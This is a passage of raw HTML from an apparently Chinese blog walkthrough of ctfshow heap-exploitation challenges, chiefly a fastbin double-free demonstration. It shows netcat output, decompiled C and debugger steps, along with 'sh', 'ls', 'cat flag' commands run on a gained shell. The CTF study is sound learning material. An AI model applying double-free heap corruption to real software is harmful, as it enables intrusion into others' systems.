data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-17-1024x818.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-742\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u6211\u4eec\u521b\u5efa\u7684\u662f\u90a3\u4e2a\u5927\u5c0f\u4e3a0x30\u7684chunk\uff0c\u6267\u884c\u5b8ccall free<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-18-1024x300.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"300\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-18-1024x300.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-743\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-19-1024x815.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"815\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-19-1024x815.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-744\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u770b\u5230\u6709\u4e00\u4e2afree chunk<\/p>\n\n\n\n<p id=\"u66415ef5\">\u4f46\u662f\u5230\u8fd9\u513f\u7a0b\u5e8f\u6bb5\u9519\u8bef\u4e86\uff0c\u53ea\u80fd\u770b\u770b\u5e08\u5085\u4eec\u7684\u8c03\u8bd5\u4e86<\/p>\n\n\n\n<p>\u63a8\u8350\u6587\u7ae0\uff1a<a href=\"https:\/\/blog.csdn.net\/2502_91269216\/article\/details\/146376715?fromshare=blogdetail&amp;sharetype=blogdetail&amp;sharerId=146376715&amp;sharerefer=PC&amp;sharesource=Yilanchia&amp;sharefrom=from_link\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/blog.csdn.net\/2502_91269216\/article\/details\/146376715?fromshare=blogdetail&amp;sharetype=blogdetail&amp;sharerId=146376715&amp;sharerefer=PC&amp;sharesource=Yilanchia&amp;sharefrom=from_link<\/a><br><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><br>3\u3001pwn147<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-20-1024x720.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"720\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-20-1024x720.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-745\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ue15ca2b3\">\u63d0\u793a\u662ffastbin_dup<\/p>\n\n\n\n<p id=\"ubf355fa1\">\u6211\u4eec\u6765\u770b\u770bchecksec<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-21-1024x457.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"457\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-21-1024x457.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-746\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u7136\u540e\u8fd0\u884c\u4e00\u4e0b\u7a0b\u5e8f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>faetong@faetong-virtual-machine:~\/pwnit$ nc pwn.challenge.ctf.show 28225\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : Fastbin_dup -- Double free                              \n    * *************************************                           \n\u6f14\u793a fastbin \u7684 double free\n\u9996\u5148\u7533\u8bf7 3 \u4e2a chunk\n\u7b2c\u4e00\u4e2a malloc(8): 0xd08010\n\u7b2c\u4e8c\u4e2a malloc(8): 0xd08030\n\u7b2c\u4e09\u4e2a malloc(8): 0xd08050\nfree \u6389\u7b2c\u4e00\u4e2a\n\u5f53\u6211\u4eec\u518d\u6b21 free 0xd08010 \u7684\u65f6\u5019, \u7a0b\u5e8f\u5c06\u4f1a\u5d29\u6e83\u56e0\u4e3a 0xd08010 \u5728 free \u94fe\u8868\u7684\u7b2c\u4e00\u4e2a\u4f4d\u7f6e\u4e0a\n\u6211\u4eec\u5148 free 0xd08030.\n\u73b0\u5728\u6211\u4eec\u5c31\u53ef\u4ee5\u518d\u6b21 free 0xd08010 \u4e86, \u56e0\u4e3a\u4ed6\u73b0\u5728\u4e0d\u5728 free \u94fe\u8868\u7684\u7b2c\u4e00\u4e2a\u4f4d\u7f6e\u4e0a\n\u73b0\u5728\u7a7a\u95f2\u94fe\u8868\u662f\u8fd9\u6837\u7684 &#91; 0xd08010, 0xd08030, 0xd08010 ]. \u5982\u679c\u6211\u4eec malloc \u4e09\u6b21, \u6211\u4eec\u4f1a\u5f97\u5230\u4e24\u6b21 0xd08010 \n\u7b2c\u4e00\u6b21 malloc(8): 0xd08010\n\u7b2c\u4e8c\u6b21 malloc(8): 0xd08030\n\u7b2c\u4e09\u6b21 malloc(8): 0xd08010\n$\n<\/code><\/pre>\n\n\n\n<p><br>\u6f14\u793a\u7684\u662ffastbin\u7684double free\uff0c\u5176\u5b9e\u4e4b\u524d\u9047\u5230\u8fc7\uff0c\u901a\u8fc7\u6f14\u793a\uff0cdouble free\u5c31\u53d8\u5f97\u76f4\u89c2\u4e86\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sh\nls\ncat flag<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-22-1024x543.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"543\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-22-1024x543.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-747\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u6211\u4eec\u6765\u8bd5\u7740\u8c03\u8bd5\u4e00\u4e0b\uff0c\u5148\u770b\u770b\u4ee3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl demo()\n{\n  char *AAAAAAAA; \/\/ &#91;rsp+0h] &#91;rbp-30h]\n  char *b; \/\/ &#91;rsp+8h] &#91;rbp-28h]\n  char *c; \/\/ &#91;rsp+10h] &#91;rbp-20h]\n  char *d; \/\/ &#91;rsp+18h] &#91;rbp-18h]\n  char *e; \/\/ &#91;rsp+20h] &#91;rbp-10h]\n  char *f; \/\/ &#91;rsp+28h] &#91;rbp-8h]\n\n  fwrite(&amp;ptr_, 1u, 0x1Fu, stderr);\n  fwrite(&amp;ptr__0, 1u, 0x19u, stderr);\n  AAAAAAAA = (char *)malloc(8u);\n  strcpy(AAAAAAAA, \"AAAAAAAA\");\n  b = (char *)malloc(8u);\n  strcpy(b, \"BBBBBBBB\");\n  c = (char *)malloc(8u);\n  strcpy(c, \"CCCCCCCC\");\n  fprintf(stderr, &amp;format_, AAAAAAAA);\n  fprintf(stderr, &amp;format__0, b);\n  fprintf(stderr, &amp;format__1, c);\n  fwrite(&amp;ptr__1, 1u, 0x12u, stderr);\n  free(AAAAAAAA);\n  fprintf(stderr, &amp;format__2, AAAAAAAA, AAAAAAAA);\n  fprintf(stderr, &amp;format__3, b);\n  free(b);\n  fprintf(stderr, &amp;format__4, AAAAAAAA);\n  free(AAAAAAAA);\n  fprintf(stderr, &amp;format__5, AAAAAAAA, b, AAAAAAAA, AAAAAAAA);\n  d = (char *)malloc(8u);\n  e = (char *)malloc(8u);\n  f = (char *)malloc(8u);\n  strcpy(d, \"DDDDDDDD\");\n  strcpy(e, \"EEEEEEEE\");\n  strcpy(f, \"FFFFFFFF\");\n  fprintf(stderr, &amp;format__6, d);\n  fprintf(stderr, &amp;format__7, e);\n  fprintf(stderr, &amp;format__8, f);\n}<\/code><\/pre>\n\n\n\n<p><br>\u6211\u4eec\u8fdb\u5165demo\u8fd9\u4e2a\u51fd\u6570\u8fdb\u884c\u7ec6\u8c03<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-23-1024x402.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"402\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-23-1024x402.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-748\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u6211\u4eec\u8fd0\u884c\u5230call malloc<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-24-1024x355.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"355\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-24-1024x355.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-749\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-25-1024x802.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"802\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-25-1024x802.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-750\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u521b\u5efa\u5b8c\uff08\u4e0b\u9762\u6362\u4e86libc-2.23.so\u548cld-2.23.so\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-26-1024x322.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"322\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-26-1024x322.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-751\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-27-1024x900.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"900\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-27-1024x900.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-752\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ua0074833\">\u6b64\u65f6\u5206\u914d\u4e863\u4e2achunk<\/p>\n\n\n\n<p id=\"u96f07eb2\">\u63a5\u4e0b\u6765\u662ffree\uff0c\u6ce8\u610f\u89c2\u5bdffastbin<\/p>\n\n\n\n<p id=\"ua2efe745\">\u7b2c\u4e00\u4e2afree\u4e86chunk0<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-28-1024x919.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"919\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-28-1024x919.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-753\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1708415b\">\u53ef\u4ee5\u770b\u5230\u5b83\u88ab\u5217\u5165\u4e86fastbin<\/p>\n\n\n\n<p id=\"u892a9a8f\">\u63a5\u4e0b\u6765free chunk1<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-29-1024x1022.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1022\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-29-1024x1022.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-754\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u73b0\u5728\u6211\u4eec\u53ef\u4ee5\u770b\u5230bins\u91cc\u9762\u7684\u60c5\u51b5<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-30-1024x629.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"629\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-30-1024x629.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-755\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ubd49c1cf\">chunk[0]-chunk[1]-chunk[0]<\/p>\n\n\n\n<p id=\"u46c7db80\">\u63a5\u4e0b\u6765\u53c8\u628achunk\u7533\u8bf7\u56de\u6765<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-31-1024x517.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"517\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-31-1024x517.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-756\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u73b0\u5728\u6211\u4eec\u8981\u770b\u770b\uff0c\u6211\u4eec\u5199\u5165\u7684\u7684\u4e1c\u897f\u662f\u4e0d\u662f\u4f1a\u51fa\u73b0\u5728chunk[0]\u4e2d<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-32-1024x304.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"304\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-32-1024x304.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-757\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-33-1024x975.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"975\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-33-1024x975.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-758\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-34-1024x422.png'><img class=\"lazyload lazyload-style-1\" 